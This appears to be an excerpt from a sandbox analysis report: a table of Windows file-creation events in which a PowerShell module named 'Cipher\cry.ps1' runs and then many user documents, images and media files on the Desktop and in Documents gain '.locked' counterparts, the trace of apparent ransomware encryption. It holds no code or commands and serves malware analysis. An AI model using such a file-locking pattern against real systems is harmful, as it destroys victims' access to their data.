| Create | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\Cipher.psm1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\Cipher.psm1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_615ec229-fe34-4253-86a5-c2d42c6c2a89 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1d59afd-fedf-4dad-a2f3-bba3e7eabe5c | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_06f90924-1e5d-474b-ba1f-65c4b5caf36a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bf1cb9b0-ce8c-44e7-bb1c-52ad1299acf8 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\1ycn0quZ.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\1ycn0quZ.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\1ycn0quZ.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\bwx6RzhfH12 -D9X-.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\bwx6RzhfH12 -D9X-.gif.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\bwx6RzhfH12 -D9X-.gif.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\IU92qrGsq4.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\IU92qrGsq4.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\IU92qrGsq4.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\TeoFlkJTTv9-\EwENjQ-2d0tAcd6ire.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\TeoFlkJTTv9-\EwENjQ-2d0tAcd6ire.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\TeoFlkJTTv9-\EwENjQ-2d0tAcd6ire.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\TeoFlkJTTv9-\tBT3suOefKMkEZKJYDp.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\TeoFlkJTTv9-\tBT3suOefKMkEZKJYDp.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\TeoFlkJTTv9-\tBT3suOefKMkEZKJYDp.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\a9dY7b_1.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\a9dY7b_1.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\a9dY7b_1.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\MrBvDZJ m.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\MrBvDZJ m.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\MrBvDZJ m.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\oase2cZbpA4gl9SmHw.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\oase2cZbpA4gl9SmHw.pdf.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\oase2cZbpA4gl9SmHw.pdf.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\9hROPZxqd4oOUgNFcHG.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\9hROPZxqd4oOUgNFcHG.xls.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\9hROPZxqd4oOUgNFcHG.xls.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\piEhyZXpexRShbLI8IsB.ppt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\piEhyZXpexRShbLI8IsB.ppt.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\piEhyZXpexRShbLI8IsB.ppt.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\F1deKy.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\F1deKy.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\F1deKy.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\JZFTTemDyGDvi.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\JZFTTemDyGDvi.avi.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\JZFTTemDyGDvi.avi.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\qN-C1SB2E4bTdX0 wrX.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\qN-C1SB2E4bTdX0 wrX.jpg.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\qN-C1SB2E4bTdX0 wrX.jpg.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\x_Oeu7-HEttBJy_TIi.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\x_Oeu7-HEttBJy_TIi.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\x_Oeu7-HEttBJy_TIi.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\AzQwVoefGF.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\AzQwVoefGF.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\AzQwVoefGF.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\C0E9wIGvGzF-.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\C0E9wIGvGzF-.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\C0E9wIGvGzF-.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\CWVTT.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\CWVTT.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\CWVTT.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\dLpUl.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\dLpUl.jpg.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\dLpUl.jpg.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\FMp1Rv9H0sIwMbUMaP.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\FMp1Rv9H0sIwMbUMaP.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\FMp1Rv9H0sIwMbUMaP.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\H7vUBSujwcgyM4U.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\H7vUBSujwcgyM4U.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\H7vUBSujwcgyM4U.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\I0i3yftI1x.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\I0i3yftI1x.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\I0i3yftI1x.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\KUODyadDcFJDHZ5D5Sn.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\KUODyadDcFJDHZ5D5Sn.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\KUODyadDcFJDHZ5D5Sn.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\OqtVBc3Qo2qAnhFLH2.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\OqtVBc3Qo2qAnhFLH2.bmp.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\OqtVBc3Qo2qAnhFLH2.bmp.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\pAQR6Uhb8oyXxz.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\pAQR6Uhb8oyXxz.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\pAQR6Uhb8oyXxz.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qoDVdgfVEP8C1IZVruKR.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qoDVdgfVEP8C1IZVruKR.bmp.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qoDVdgfVEP8C1IZVruKR.bmp.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\tjvnS0CLvj8W45c1R.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\tjvnS0CLvj8W45c1R.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\tjvnS0CLvj8W45c1R.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\u-lj86MkJ.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\u-lj86MkJ.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\u-lj86MkJ.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\WSBLdWYpk.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\WSBLdWYpk.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\WSBLdWYpk.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\ZirYt0Xt.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\ZirYt0Xt.jpg.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\ZirYt0Xt.jpg.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\-MGF\yj0sH30hJk0LAYu.ppt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\-MGF\yj0sH30hJk0LAYu.ppt.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\-MGF\yj0sH30hJk0LAYu.ppt.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\tkzv55s072Owx0PobKt\1ZzY.doc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\tkzv55s072Owx0PobKt\1ZzY.doc.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\tkzv55s072Owx0PobKt\1ZzY.doc.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\tkzv55s072Owx0PobKt\HSrjj2x8m w.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
